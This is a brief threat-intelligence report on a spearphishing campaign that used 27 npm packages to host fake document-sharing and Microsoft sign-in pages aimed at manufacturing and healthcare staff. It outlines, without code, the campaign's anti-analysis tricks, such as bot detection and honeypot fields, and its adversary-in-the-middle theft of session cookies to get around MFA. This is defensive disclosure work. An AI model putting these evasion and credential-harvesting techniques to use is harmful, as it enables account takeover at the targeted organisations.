Spearphishing Campaign Abuses npm Registry to Target U.S. and Allied Manufacturing and Healthcare Organizations

The Socket Threat Research Team uncovered a targeted phishing campaign exploiting the npm registry to host and distribute malicious packages designed to mimic secure document-sharing workflows and Microsoft sign-in pages, targeting sales and commercial personnel in critical infrastructure sectors across the U.S. and allied nations. Over a span of five months, 27 malicious npm packages were identified, all utilizing browser-executed phishing components with client-side defenses to evade analysis, redirecting victims to threat actor-controlled infrastructure for credential harvesting. The operation, distinct from previous campaigns such as Beamglea, uses npm as a hosting platform to deploy self-contained phishing flows that modify page content with embedded HTML and JavaScript, incorporating anti-analysis measures like bot detection and honeypot fields. The campaign focuses on individuals in manufacturing, industrial automation, and healthcare sectors, potentially identified through trade show directories and publicly available information, and leverages adversary-in-the-middle (AiTM) infrastructure to capture session cookies, undermining traditional MFA security measures. The Socket team has reported the activity to npm security and notified affected organizations to aid in triage and mitigation, recommending enhanced monitoring and security measures to counter the persistent threat of npm-hosted phishing infrastructure.